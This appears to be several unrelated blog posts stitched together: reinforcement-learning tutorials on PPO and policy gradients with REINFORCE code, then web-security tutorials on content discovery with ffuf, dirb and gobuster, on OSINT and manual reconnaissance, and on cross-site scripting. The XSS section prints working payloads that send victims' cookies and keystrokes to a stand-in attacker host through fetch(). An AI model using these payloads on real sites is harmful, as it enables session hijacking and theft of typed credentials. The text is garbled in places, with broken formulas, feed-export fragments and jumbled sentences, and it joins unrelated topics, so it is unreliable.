First of all, since the policy gradient was touched upon in a previous post, it is assumed that the reader is somewhat familiar with the topic. Generally, policy gradient methods perform stochastic gradient ascent on an estimator of the policy gradient. The most common estimator is the following:

$$\hat{g} = \hat{\mathbb{E}}t\left[\nabla\theta\log\pi_\theta(a_t|s_t)\hat{A}_t \right]$$

In this formulation,

\(\pi_\theta\) is a stochastic policy;

\(\hat{A}_t\) is an estimator of the advantage function at timestep \(t\);

\(\hat{\mathbb{E}}_t\left[...\right]\) is the empirical average over a finite batch of samples in an algorithm that alternates between sampling and optimization.

For implementations of policy gradient methods, an objective function is constructed in such a way that the gradient is the policy gradient estimator. Therefore, said estimator can be calculated by differentiating the objective.

$$L^{PG}(\theta)=\hat{\mathbb{E}}t\left[\log\pi\theta(a_t|s_t)\hat{A}_t\right]$$

This objective function is also known as the policy gradient loss. If the advantage estimate is positive (i.e., the agent's actions in the sample trajectory resulted in a better-than-average return), the probability of selecting those actions again is increased. Conversely, if the advantage estimate is negative, the likelihood of selecting those actions again is decreased.

Continuously running gradient descent on the same batch of collected experience will cause the neural network's parameters to be updated far outside the range of where the data was originally collected. Since the advantage function is essentially a noisy estimate of the real advantage, it will in turn be corrupted to the point where it is completely wrong. Therefore, the policy will be destroyed if gradient descent is continually run on the same batch of collected experience.

The aforementioned trust region policy optimization algorithm (TRPO) aims to maximize an objective function while imposing a constraint on the size of the policy update (to avoid straying too far from the old policy within a single update), as this would destroy the policy.

$$\begin{align*} \max_\theta\,&\hat{\mathbb{E}} t\left[\frac{\pi\theta(a_t|st)}{\pi{\theta_\text{old}}(a_t|s_t)}\hat{A}_t\right] \ \text{subject to }&\hat{\mathbb{E}}t\left[KL\left[\pi{\theta_\text{old}}(\cdot|st), \pi\theta\right]\right]\leq \delta \end{align*}$$

Here, \(\theta_{\text{old}}\) is a vector containing the policy parameter before the update.

TRPO suggests using a penalty instead of a constraint because the latter adds additional overhead to the optimization process and can sometimes lead to very undesirable training behavior. This way, the former constraint is directly included in the optimization objective:

$$\max_{\theta}\hat{\mathbb{E}}_t\left[\frac{\pi\theta(a_t|s*t)}{\pi*{\theta_\text{old}}(a_t|s*t)}\hat{A}t-\beta,KL\left[\pi{\theta*\text{old}}(\cdot|s*t), \pi*\theta(\cdot|s_t)\right]\right]$$

That being said, TRPO itself uses a hard constraint instead of a penalty. This is because the introduced coefficient \(\beta\) turns out to be very tricky to set to a single value without affecting performance across different problems.

Therefore, PPO suggests additional modifications to optimize the penalty objective using stochastic gradient descent; choosing a fixed penalty coefficient \(\beta\) will not be enough.

Say \(r_t(\theta)\) is the probability ratio between the new updated policy and the old policy:

$$r*t(\theta) = \frac{\pi*\theta(a_t|s*t)}{\pi*{\theta_\text{old}}(a_t|s_t)}$$

$$\Rightarrow \text{ therefore } r(\theta_\text{old})=1.$$

So given a sequence of sampled action-state pairs, this \(r_t(\theta)\) value will be larger than 1 if the action is more likely now than it was in \(\pi_{\theta_{\text{old}}}\). On the other hand, if the action is less probable now than before the last gradient step, \(r_t(\theta)\) will be somewhere between 0 and 1.

Multiplying this ratio \(r_t(\theta)\) with the estimated advantage function results in a more readable version of the normal TRPO objective function, so-called a "surrogate" objective:

$$L^{CPI}(\theta) = \hat{\mathbb{E}}t\left[\frac{\pi\theta(a_t|s*t)}{\pi*{\theta_\text{old}}(a_t|s_t)}\hat{A}_t\right]=\hat{\mathbb{E}}_t\left[r_t(\theta)\hat{A}_t\right]$$

Maximizing this \(L^{CPI}\) without any further constraints would result in a very large policy update, which, as already explained, might end up destroying the policy. Therefore, Schulman et al. suggest penalizing those changes to the policy that would move \(r_t(\theta)\) too far away from 1. Consequently, this is our final result for the final objective:

$$L^{CLIP}(\theta) = \hat{\mathbb{E}}_t\left[\min(r_t(\theta)\hat{A}_t, \text{clip}(r_t(\theta),1-\epsilon,1+\epsilon)\hat{A}_t\right]$$

Basically this objective is a pessimistic bound on the unclipped objective. That is because the objective chooses the minimum between the normal unclipped policy gradient objective \(L^{CLIP}\) and a new clipped version of that objective. The latter discourages moving \(r_t\) outside of the interval \([1 - \epsilon, 1 + \epsilon]\). Two insightful figures are provided in the paper, helping to illustrate this concept.

The first graph indicates that, for a single timestep t in \(L^{CPI}\), the selected action had an estimated outcome better than expected. Conversely, the second graph displays an instance when the chosen action resulted in a negative effect on the result. For example, the objective function flattens out for values of r that are too high while the advantage was positive. This means that if an action was good and is now a lot more likely than it was in the old policy update \(\pi_{\theta_\text{old}}\), the clipping prevents too large of an update based on just a single estimate. Again, this might destroy the policy because of the advantage function's noisy characteristics. Of course, on the other hand, for terms with a negative advantage, the clipping also avoids over-adjusting for these values since that might reduce their likelihood to zero while having the same effect of damaging the policy based on a single estimate, but this time in the opposite direction.

If, however, the advantage function is negative and *r* is large, meaning the chosen action was bad and is much more probable now than it was in the old policy \(\pi_{\theta_\text{old}}\), then it would be beneficial to reverse the update. And, as it so happens, this is the only case in which the unclipped version has a lower value than the clipped version, and it is favored by the minimum operator. This really showcases the finesse of PPO's objective function.

Alternatively or additionally to the surrogate objective proposed by Schulman et al., they provide another concept, the so-called adaptive KL penalty coefficient. The general idea is to penalize the KL divergence and then adapt this penalty coefficient based on the last policy updates. Therefore, the procedure can be divided into two steps:

- First the policy is updated over several epochs by optimizing the KL-penalized objective:

$$L^{KLPEN}(\theta) = \hat{\mathbb{E}}t\left[\frac{\pi\theta(a_t|s*t)}{\pi*{\theta_\text{old}}(a_t|s*t)}\hat{A}t - \beta KL[\pi{\theta*\text{old}}(\cdot|s*t), \pi*\theta(\cdot|s_t)]\right]$$

Then \(d\) is computed as \(d = \hat{\mathbb{E}}_t[KL[\pi_{\theta_\text{old}}(\cdot|s_t), \pi_\theta(\cdot|s_t)]]\) to finally update the penalty coefficient \(\beta\) based on some target value of the KL divergence \(d_\text{targ}\):

if \(d<\frac{d_\text{targ}}{1.5}: \beta \leftarrow \beta/2\)

if \(d>d_\text{targ} \times 1.5: \beta \leftarrow \beta\times2\)

This method seems to generally perform worse than the clipped surrogate objective; however, it is included simply because it still makes for an important baseline.

Also note that, while the parameters 1.5 and 2 are chosen heuristically, the algorithm is not particularly sensitive to them and the initial value of \(\beta\) is not relevant because the algorithm quickly adjusts it anyway.

To test PPO, the algorithm was applied to several gym environments. Please note that the used implementation of the PPO algorithm originates from OpenAI's stable-baselines3 GitHub repository.

This environment might be familiar from previous posts in this series. To quickly summarize, a pole is attached by an unactuated joint to a cart. The agent operates with an action space of two: it can apply force to the left (-1) or the right (+1). The model receives a reward of +1 each timestep if neither of the following conditions are met: the cart's x position exceeds a threshold of 2.4 units in either direction or the pole is more than 15 degrees from vertical; otherwise, the episode ends.

We trained a PPO agent for 15000 timesteps on the environment. The agent reached the perfect mean reward of 500 for CartPole-v1 after only approximately 7500 timesteps of training.

Since gym allows for modification of its environments we created a custom version of CartPole named CartPole-v1k that extends the maximum number of timesteps in an episode from 500 (CartPole-v1) to 1000. Of course this means that the maximum reward for an episode also increased to 1000. As shown in the following figure the PPO agent trained on this new environment reached the maximum reward a little later after about 8500 timesteps.

The standard deviation of the reward during the 100 episodes each evaluation step also declines to 0 over even less than the first 8500 timesteps. This means the agent reaches the maximum reward in every single episode after that without fail.

Interestingly, the old model that was trained on the original environment also reached a reward of 1000 on the modified version over all 100 episodes it was evaluated (mean reward of 1000 with a standard deviation of 0). It seems safe to say that the agent not only reached its maximum reward after about 7500 timesteps but also perfected the act of balancing the pole over the next few thousand iterations.

This environment consists of a racing car attempting to maneuver a race track. Observations comprise a 96x96-pixel image, and the action space contains three actions: steering, accelerating, and braking. Each frame is penalized with a negative reward of -0.1, while completion of a track section is rewarded with +1000/N, where N is the number of track sections. Thus, the final reward is calculated as 1000 - the number of frames it took for the agent to complete the track. An episode ends when the car finishes the entire track or moves outside of the 96x96-pixel plane.

Yet again, we trained a PPO agent--this time over half a million timesteps. Although the mean reward did not fully stabilize over the training period because the agent was still trying out new--and sometimes weaker--strategies, the best model achieved a mean reward of 600 over 50 episodes of evaluation.

This agent was already able to navigate the track and only occasionally oversteered in curves, causing it to lose the track. The following graphic visualizes the 500,000-timestep learning period.

In this post, we have looked at the Proximal Policy Optimization algorithm and its performance on two popular gym environments. We applied PPO to CartPole-v1 and a modified version of it, named CartPole-v1k, where the maximum number of timesteps per episode was increased from 500 to 1000. We trained a separate agent on the Car Racing environment and achieved a mean reward of 600 over 50 evaluation episodes.

PPO is an ideal tool to use with complex, continuous environments such as those discussed in this post. This algorithm operates reliably and efficiently, allowing us to create more sophisticated agents that are capable of outperforming their predecessors. With such powerful reinforcement learning algorithms now available, the possibilities for creating autonomous agents that can successfully interact with their environment are virtually limitless. We look forward to exploring more complex environments and scenarios in future posts.

Those of you familiar with neural networks will probably have heard of stochastic gradient descent. The goal of stochastic gradient descent is to compute the gradient of a loss function to then adjust the parameters of the network and minimize the loss function by stepping in the opposite direction of the gradient.

We can utilize the very similar stochastic gradient ascent to approach reinforcement learning problems. To this end, we define a reward function \(J(\theta)\) measuring the quality of our policy \(\pi_{\theta}\). In reinforcement learning this is quite simple since reinforcement inherently utilizes rewards \(r\). Thus, the reward function is chosen to be the expected reward of a trajectory \(\tau\) generated by the current policy \(\pi_{\theta}\). Let \(G(\tau)\) be the infinite horizon discounted-return starting at time step \(t = 0\) for the trajectory \(\tau\).

The derivation of the policy gradient using finite or undiscounted returns are almost identical. For finite horizon \(T\) simply replace all \(\infty\) with \(T\).

$$ G(\tau) = \sum_{t = 1}^\infty \gamma^t r_{t+1} \ J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} [ G(\tau) ] $$

If it is possible to now calculate the gradient of the reward function /latex we can take a stochastic gradient ascent step based on a hyperparameter \(\alpha\) to maximize the reward function:

$$\theta = \theta + \alpha \nabla_\theta J(\theta) $$

The only problem remaining is to determine what the gradient \(\nabla_\theta J(\theta)\) looks like.

**Step 1:**

To compute \(\mathbb{E}[X]\), we sum over all possible values of \( X=x\), which are weighted by their probability \( P(x)\). In other words, \( \mathbb{E}[X] = \sum_x P(x) x\).

If we sum over all possible trajectories \(\tau\), we can do something similar for \(J(\theta)\) by relying on the probability that \(\tau\) occurs given policy \(\pi_\theta\).

$$J(\theta) = \sum_\tau P(\tau | \theta) G(\tau) \ \nabla_\theta J(\theta) = \nabla_\theta \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} [ G(\tau) ] $$

$$J(\theta) = \nabla_\theta \sum_\tau P(\tau | \theta) G(\tau) = \sum_\tau \nabla_\theta P(\tau | \theta) G(\tau) $$

**Step 2:**

Given a function \(f(x)\), the log-derivative trick is useful for rewriting the derivative \(\frac{d}{dx} f(x)\)and relies upon the derivative of \(\log(x)\)being \(\frac{1}{x}\)and the chain rule.

$$\frac{d}{dx} f(x) = f(x) \frac{1}{f(x)} \frac{d}{dx} f(x) = f(x)\frac{d}{dx} \log(f(x)) $$

Since \(G(\tau)\) is independent of \(\theta\) we can apply this trick to rewrite \(P(\tau | \theta)\):

$$ J(\theta) = \sum_\tau \nabla_\theta P(\tau | \theta) G(\tau) \ = \sum_\tau P(\tau | \theta) \nabla_\theta \log(P(\tau | \theta)) G(\tau) $$

**Step 3:**

We still need an equation for \(P(\tau | \theta)\), but we can find it by thinking of the problem as a Markov decision process (MDP). Let's say that \(p(s_1)\) is the probability of starting a trajectory in state \(s_1\). Then, we can express \(P(\tau | \theta)\) by multiplying together the probabilities for each occurrence of all states \(s_t\) and actions \(a_t\).

$$P(\tau | \theta) = p(s_1) \prod_{t = 1}^\infty P(s_{t+1} | s_t, a_t) \pi_\theta(a_t | s_t) \ \log(P(\tau | \theta))$$

$$J(\theta) = \log(p(s_1)) \sum_{t = 1}^\infty \big( \log(P(s_{t+1} | s_t, a_t)) + \log(\pi_\theta(a_t | s_t))\big) $$

**Step 4:**

Please note that \(p(s_1)\) and \(P(s_{t+1} | s_t, a_t)\) are also not affected by \(\theta\).

$$ \nabla_\theta \log(P(\tau | \theta)) = \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t))$$

$$\nabla_\theta J(\theta) = \sum_\tau P(\tau | \theta) \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) G(\tau) $$

We can now reverse the first step, leaving us with the final equation that can be estimated by sampling multiple trajectories and taking the mean gradients for the sampled trajectories.

$$\nabla_\theta J(\theta) = \mathop{\mathbb{E}}{\tau \sim \pi\theta} \left[ \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) G(\tau) \right]$$

When we encounter reinforcement learning issues, probability distributions like \(\pi_\theta(a|s), P(\tau | \theta), P(s_{t+1} | s_t, a_t)\) are constantly at play. Since these are all normalized by definition, given \(P_\theta(x)\), this means:

$$1 = \sum_x P_\theta(x).$$

If we do not take the gradient of both sides and use the log-derivative trick, we get:

$$\nabla_\theta 1 = \nabla_\theta \sum_x P_\theta(x) $$ $$0 = \sum_x \nabla_\theta P_\theta(x) $$

$$0 = \sum_x P_\theta(x) \nabla_\theta \log(P_\theta(x))$$ $$0 = \mathop{\mathbb{E}}_{x \sim P_\theta(x)} \left[ \nabla_\theta \log(P_\theta(x)) \right]$$

This lemma, in combination with the rules for the expected value, yields the following given a state \(s_t\) and an arbitrary function \(b(s_t)\) only dependent on the state:

$$\mathop{\mathbb{E}}_{a_t \sim \pi_\theta(a_t | s_t)} \left[ \nabla_\theta \log(\pi(a_t | s_t)) b(s_t) \right] = \mathop{\mathbb{E}}_{a_t \sim \pi_\theta(a_t | s_t)} \left[ \nabla_\theta \log(\pi(a_t | s_t)) \right] \cdot \mathop{\mathbb{E}}_{a_t \sim \pi_\theta(a_t | s_t)} [b(s_t)] $$ $$ = \mathop{\mathbb{E}}_{a_t \sim \pi_\theta(a_t | s_t)} \left[ \nabla_\theta \log(\pi(a_t | s_t)) \right] \cdot b(s_t)\ = 0 \cdot b(s_t)\ = 0 $$

Since the expected value of this expression is \(0\), we can freely add or subtract it from the policy gradient equation. In this case, the function \(b(s_t)\) is called a baseline. One common baseline is the value function \(V^{\pi_{\theta}}(s_t)\), as this reduces the variance when approximating the equation through sampling, thus helping us to determine the gradient with greater accuracy.

$$\nabla_\theta J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \left[ \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) (G(\tau) - b(s_t)) \right] $$ $$ \nabla_\theta J(\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \left[ \sum_{t = 1}^\infty \nabla_\theta \log(\pi_\theta(a_t | s_t)) (G(\tau) - V^{\pi_{\theta}}(s_t)) \right]$$

Though this alteration requires a way to calculate \(V^{\pi_{\theta}}(s_t)\), it is most often achieved using a second neural network trained to approximate \(V^{\pi_{\theta}}(s_t)\) as best as possible.

The generalized form of policy gradient with finite-horizon and undiscounted return is defined as:

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t)G(\tau) \big]$$

The sole components of this expression are already defined above in the derivation section, albeit for the infinite horizon. However, to observe the alternate forms of this expression, we would replace \(G()\) with \(_t\):

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t)\Phi_t \big]$$

We can now use \(\Phi_t\) to form alternate approaches that would yield the same results for this expression. For completeness, we note that \(\Phi_t = G(\tau)\). Furthermore, \(R(\tau)\) can be dissolved into \(\sum_{t'=t}^{T}R(s_{t'},a_{t'},s_{t'+1})\). The reason behind this is that \(R(\tau)\) would mean we observe the sum of all rewards that were obtained; however, past rewards should not influence the reinforcement of the action. Consequently, it would only be sensible to observe the rewards that come after the action which would be reinforced: \(\Phi_t = \sum^T_{t'=t}R(s_{t'},a_{t'},s_{t'+1})\).

The on-policy action value function \(Q^\pi(s,a) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[R(\tau)|s_0=s, a_0=a\big]\), which gives the expected return when starting in state \(s\) and taking action \(a\), can also be expressed as \(\Phi_t\). This is proven using the law of iterated expectations, resulting in:

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t) Q^{\pi_{\theta}}(s,a) \big]$$

The advantage function, \(A^\pi = Q^\pi(s,a)- V^\pi(s)\), which is used to compute the advantage of an action over other actions, is proven in the same way as the action-value function and can also be inserted into the policy gradient expression:

$$\nabla_\theta J(\pi_\theta) = \mathop{\mathbb{E}}_{\tau \sim \pi_\theta} \big[\sum^T_{t=0}\nabla_\theta \log \pi_\theta(a_t|s_t) A^{\pi_{\theta}}(s_t,a_t) \big]$$

All of these expressions have one thing in common: they have the same expected value of the policy gradient, even though they differ in form.

To gain a better understanding of these underlying concepts, we will introduce REINFORCE, a popular policy gradient algorithm. The core idea of this algorithm is to estimate the return using Monte-Carlo methods based on episode samples and to utilize those to update the policy \(\pi\). The following pseudo-algorithm shows the generation of real and full sample trajectories. The estimated return \(G_t\), computed by using these trajectories, can then be used to update the policy parameter \(\theta\), due to the already-introduced equality between the expectation of the sample gradient and the actual gradient.

Initialize the policy parameter \(\theta\) at random.

Generate one trajectory on policy \(\pi_\theta: S_1, A_1, R_2, S_2, A_2, ..., S_T\)

For \(t=1, 2, ..., T:\)

Estimate the return \(G_T\);

Update policy parameters: \(\theta \leftarrow \theta + \alpha\gamma^t G_t \nabla_\theta \log_{\pi_\theta}\left( A_t | S_t \right)\)

To get a better understanding a code example for OpenAI Gym's CartPole environment is provided.

```
import sys
import torch
import gym
import numpy as np
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import matplotlib.pyplot as plt
# Constants
GAMMA = 0.9
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_size, learning_rate=3e-4):
super(PolicyNetwork, self).__init__()
self.num_actions = num_actions
self.linear1 = nn.Linear(num_inputs, hidden_size)
self.linear2 = nn.Linear(hidden_size, num_actions)
self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.softmax(self.linear2(x), dim=1)
return x
def get_action(self, state):
state = torch.from_numpy(state).float().unsqueeze(0)
probs = self.forward(Variable(state))
highest_prob_action = np.random.choice(self.num_actions, p=np.squeeze(probs.detach().numpy()))
log_prob = torch.log(probs.squeeze(0)[highest_prob_action])
return highest_prob_action, log_prob
#%%
def update_policy(policy_network, rewards, log_probs):
discounted_rewards = []
for t in range(len(rewards)):
Gt = 0
pw = 0
for r in rewards[t:]:
Gt = Gt + GAMMA**pw * r
pw = pw + 1
discounted_rewards.append(Gt)
discounted_rewards = torch.tensor(discounted_rewards)
discounted_rewards = (discounted_rewards - discounted_rewards.mean()) / (discounted_rewards.std() + 1e-9) # normalize discounted rewards
policy_gradient = []
for log_prob, Gt in zip(log_probs, discounted_rewards):
policy_gradient.append(-log_prob * Gt)
policy_network.optimizer.zero_grad()
policy_gradient = torch.stack(policy_gradient).sum()
policy_gradient.backward()
policy_network.optimizer.step()
#%%
def main():
env = gym.make('CartPole-v0')
policy_net = PolicyNetwork(env.observation_space.shape[0], env.action_space.n, 128)
max_episode_num = 5000
max_steps = 10000
numsteps = []
avg_numsteps = []
all_rewards = []
for episode in range(max_episode_num):
state = env.reset()
log_probs = []
rewards = []
for steps in range(max_steps):
env.render()
action, log_prob = policy_net.get_action(state)
new_state, reward, done, _ = env.step(action)
log_probs.append(log_prob)
rewards.append(reward)
if done:
update_policy(policy_net, rewards, log_probs)
numsteps.append(steps)
avg_numsteps.append(np.mean(numsteps[-10:]))
all_rewards.append(np.sum(rewards))
if episode % 1 == 0:
sys.stdout.write("episode: {}, total reward: {}, average_reward: {}, length: {}\n".format(episode, np.round(np.sum(rewards), decimals = 3), np.round(np.mean(all_rewards[-10:]), decimals = 3), steps))
break
state = new_state
plt.plot(numsteps)
plt.plot(avg_numsteps)
plt.xlabel('Episode')
plt.show()
#%%
if __name__ == '__main__':
main()
```

The environment consists of a pole attached to a cart via a joint, with forces that can be applied to the cart in both horizontal directions. The goal is to keep the pole upright (less than 15 degrees from vertical) for as long as possible (while the timesteps are limited to 200 max for this training). The agent receives a reward of +1 for each timestep it keeps the pole from falling over or moving the cart more than 2.4 units away from the center.

Policy Gradient is an efficient Reinforcement Learning (RL) method that does not need to analyze the entire action space, in contrast to previously introduced methods like Q-Learning and thus avoiding the curse of dimensionality.

Automated content discovery, or ACD, is a process of finding and extracting content from websites automatically. This procedure is automated since it frequently entails hundreds, thousands, or even millions of requests to a web server. Using these requests, malicious individuals and organizations may be able to obtain information such as usernames and passwords. The end goal is to receive access to resources we didn't know existed before. Wordlists aid in the accomplishment of this objective by allowing us to check whether a file or directory exists on a website. What are Wordlists?

Wordlists are a collection of words that can be used to find information on the internet. They can be used to find usernames, passwords, and other sensitive information. The benefit of using wordlists is that they are easy to use and can be very effective in finding the information you're looking for. This is an excellent site for wordlists, with Daniel Miessler maintaining SecLists. Automation Tools

There are a number of different automation tools that can be used for hacking purposes. Some of these tools include FFUF, DIRB, and Gobuster.

FFUF is an open-source web fuzzing program for finding components and content within web applications, as well as web servers. What do I mean by this? When you visit a website, you're likely to see material that the site's owner wants to offer you, such as index.php on a page like that. The difficulties in a website that must be addressed may exist outside of the security perimeter. For example, the owner of the website may have content hosted at /admin.php, that you both want to know about, and test. FFUF is a tool that may help to find those items, for your perusal.

**Example using wordlists with FFUF:**

```
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://IP/
```

**Source:** FUFF Source

DIRB is a Web Content Scanner. It searches for existing (and/or hidden) Web Objects on the Internet. It does so by launching a dictionary-based assault against a web server and analyzing the response.

It comes with built-in preconfigured attack wordlists, but you may also use your own wordlists. DIRB can also operate as a traditional CGI scanner, but keep in mind that it is primarily a content scanner, not a vulnerability scanner.

The primary goal of this tool is to assist in professional web application auditing. It addresses areas that traditional web vulnerability scanners may miss. In particular, it searches for specific web objects that other generic CGI scanners may miss. It doesnt search for vulnerabilities nor does it look for web content that can be vulnerable.

**Example using wordlists with DIRB:**

```
user@machine$ dirb http://IP/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

**Source:** DIRB Source

The Go language record scanner Gobuster is worth seeking. Brute-force scanners such as DirBuster and DIRB in popular directories are capable of working gracefully, yet they may frequently be slow and responsive to mistakes. Gobuster, on the other hand, may be a Go-based variant of that software and is available in a command-line format. The major advantage of utilizing Gobuster over other directory searchers is that it is fast.

**Example using wordlists with Gobuster:**

```
user@machine$ gobuster dir --url http://IP/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

**Source:** Gobuser Source

In this article, we discussed the basics of automated content discovery and some of the tools that are available to help with this process. We also took a look at how wordlists can be used to find sensitive information on the internet. Stay tuned for future articles in which we will discuss more hacking tools and techniques!

]]>Google hacking / Dorking takes advantage of Google's sophisticated search engine capabilities, which let you select unique material. You may, for example, use the site: filter to select out items from a specific domain name (for example, webpage.com) you can then match this up with certain search terms, such as admin (webpage.com admin), which will only show results from the webpage.com website that include the term admin. You may also combine multiple filters.

For more information check the following Wikipedia webpage: https://en.wikipedia.org/wiki/Google_hacking

Wappalyzer is a cross-platform utility that uncovers the technologies used on websites. It can identify content management systems (CMS), e-commerce platforms, frameworks, payment processors web servers, and other technology-related features.

For more information check the following website: https://www.wappalyzer.com/

The Wayback Machine is a historical archive created by the Internet Archive. It stores copies of websites and allows users to browse through them. The Wayback Machine can be used to view past versions of websites or to track changes over time. You can look up a domain name and see how often the service scraped the web page and stored the content. This service can be used to find out if any old pages remain on the current website.

For more information check the following website: https://archive.org/web/

GitHub is a web-based hosting service for software development projects. It allows users to share code repositories, track changes, and collaborate on projects. GitHub can be used to find open-source code snippets, connectors, and other tools that may be useful in investigations or business analysis.

You may use GitHub's search function to look for company names or website names in the hopes of finding repositories linked to your objective. You may discover source code, passwords, or other information that you didn't already have after it's been discovered.

S3 Buckets are cloud-based storage services offered by Amazon. They allow users to store files and data in the cloud. The file's owner may restrict access to only those people who have permission to view or modify the data. These settings are sometimes incorrect and unintentionally allow access to files that should not be accessible to the general public. The S3 buckets are accessible at http(s)://{name}.s3.amazonaws.com, where {name} is derived by the owner. There are many ways to discover S3 buckets. For example, you may look for URLs in the website's page source, GitHub repositories, or even automate the process.

In this article, we have discussed OSINT content discovery methods that can be used in investigations and business analysis. These methods include Google hacking/Dorking, Wappalyzer, Wayback Machine, GitHub, and S3 buckets. Each of these tools has its own unique benefits that can be used to locate content from publicly available sources. I hope you find these tools useful and informative.

As always, if you have any questions or comments, please feel free to reach out to us. Thank you for reading!

]]>In many cases, content discovery is a necessary step in the overall process of web application security testing. By uncovering content that was not intended for public viewing, we can better understand how the application works and identify potential vulnerabilities. There are a variety of methods that can be used for content discovery, each with its own advantages and disadvantages.

There are three primary methods for finding content on a website: manually, automatically, and through OSINT (Open-Source Intelligence). In this post, we'll focus on Manually Determining Content.

There are several places on a website where we may look for more material to get started.

The robots.txt file is a file that specifies which pages on your website should or shouldn't be displayed in search engine results, as well as which search engines are allowed to crawl the site. It's not unusual to block certain website sections in search engine results. These pages might be areas like administration interfaces or files intended for website customers. Thus the file provides us with a list of sites that the site's owners don't want us to discover as penetration testers.

The favicon is the little graphic that appears in the browser's tab next to the website's name. It's also displayed in the address bar when you hover over the website's name. The favicon can be a useful indicator of content on a website.

When a website is developed using a framework, the installer's favicon may remain in the browser tab. If the website developer doesn't replace this with a custom one, it might indicate which framework they're using.

The OWASP host a database of standard framework icons that you may utilize to verify against the targets favicon (Favicon Database). We can use external sources to learn more about the framework stack after we've identified it.

A sitemap is a file that lists all the pages on a website. It can be used as a content discovery tool because it provides an overview of all the content on a site. Sitemaps are especially helpful when you're trying to identify which sections of a website are being blocked by the robots.txt file. The `sitemap.xml`

file may be accessed by adding `/sitemap.xml`

to the website URL.

HTML headers can be a valuable source of information for content discovery. They contain metadata about the page, including the title, description, keywords, webserver software and possibly the programming/scripting language in use. For example, the web server is NGINX version 1.18.0 and runs PHP version 7.4.3, while the database server is MySQL 5.7 (but running on a separate port). Using this information, we may discover vulnerable versions of software in use.

We can show the HTML headers with a curl command against the web server, using the `-v`

switch to produce verbose mode and provide the headers:

```
curl http://ip -v
```

Once we've identified the content management system (CMS) in use, we can investigate further to learn about the framework stack. The framework stack refers to the collection of software used to power a website. It usually includes a web server, a CMS, and a database. Often, the framework stack is revealed in the HTML headers of the website. We may discover even more information from there, such as the software's features and other information, which might lead us to additional material.

In this post, we've looked at some methods for manually content discovery. We've seen how to use the robots.txt file, favicon, sitemap.xml, and HTML headers to get started. We've also looked at how to identify the content management system (CMS) in use and investigate the framework stack. These techniques can be valuable in our efforts to gather more information about a website.

]]>Unrestricted web applications allow users to attack other users' accounts with Cross-Site Scripting, also known as XSS in the cybersecurity world. It's a type of injection assault where attackers inject malicious JavaScript into a website in order for it to be loaded and executed by other people.

If you can get JavaScript to execute on a user's computer, you may do a lot of things. This might range from monitoring the victim's cookies to seizing control of their session, running a keylogger that records every keystroke the user makes while visiting the website, or redirecting them to an entirely different website altogether.

The payload in XSS is the JavaScript code we want to execute on the target's computer. There are two components to the payload: an intention and a modification.

The intention is what you want the JavaScript to do in practice, while the modification defines the changes to the code that must be made in order for it to execute as each situation is unique.

This is the most basic type of payload, and all you want to accomplish is show that you can XSS a webpage. This is generally achieved by causing an alert box to appear on the page with random text, such as:

```
<script>alert('Yaj, XSS the webpage!');</script>
```

Cookies on the computers of targets are commonly used to store information about a user's session, such as login tokens. The following code utilizes a JavaScript function to steal the victim's cookie, base64-encode it for transmission, and then post it to a website controlled by the hacker. The cookies may be used by hackers to take control of the target's session and be recorded as that person.

```
<script>fetch('https://hackerwebpage.com/steal?cookie=' + btoa(document.cookie));</script>
```

The following script is a key logger. This means anything you type on the website will be sent to a website under the hacker's control. If the site where the payload was delivered accepted user registrations or credit card information, this might be quite dangerous.

```
<script>document.onkeypress = function(e) { fetch('https://hackerwebpage.com/log?key=' + btoa(e.key) );}</script>
```

When user-supplied data is included in the source of an HTTP request without any validation, it becomes possible for a reflected XSS vulnerability to occur.

The attacker may post links or embed them in an iframe on a different website to potential victims, enticing them to execute code on their browser, potentially leaking session or consumer data.

Every conceivable entrance should be tested; these include:

- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers

The XSS payload is saved on the web application (in a database, for example) and then run when other people visit the site or page.

The attacker's malicious JavaScript might redirect users to another site, capture the user's session cookie, or execute other website operations while posing as a visitor.

You'll need to test every conceivable entry point where data is believed to be stored and then presented back in areas that other users have access to.

Once you've discovered some data that's being kept in a web application, you'll need to ensure that your JavaScript payload will work; your code will probably be injected into a text area in a web page somewhere.

The Document Object Model (DOM) is a programming interface for HTML and XML documents. It functions as a proxy for the document, allowing applications to modify the document's structure, style, and content. A web page is a document, and it can be viewed in the browser window or as an HTML source file.

JavaScript is executed inside the client-side web browser within the DOM. This refers to attacks that target websites where the data isn't being transmitted or submitted to a backend server.

The malicious code may be used to capture information from the user's session and redirect them to another website or steal content from the page or their session.

DOM Based XSS is difficult to test for and needs a thorough understanding of JavaScript to comprehend the source code. You'd need to search for bits of user-supplied input in the DOM (Document Object Model) and then inject your code.

You must also study how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript functions like **eval()** or **setTimeout()**.

Blind XSS is similar to stored XSS in that your payload is saved on the site for another user to view, but you can't see the payload working or test it against yourself.

The attacker's JavaScript may call back to the attacker's website, revealing the portal URL, cookies, and even what is being viewed on the portal page. Now the hacker has access to a staff member's session and has access to their personal portal.

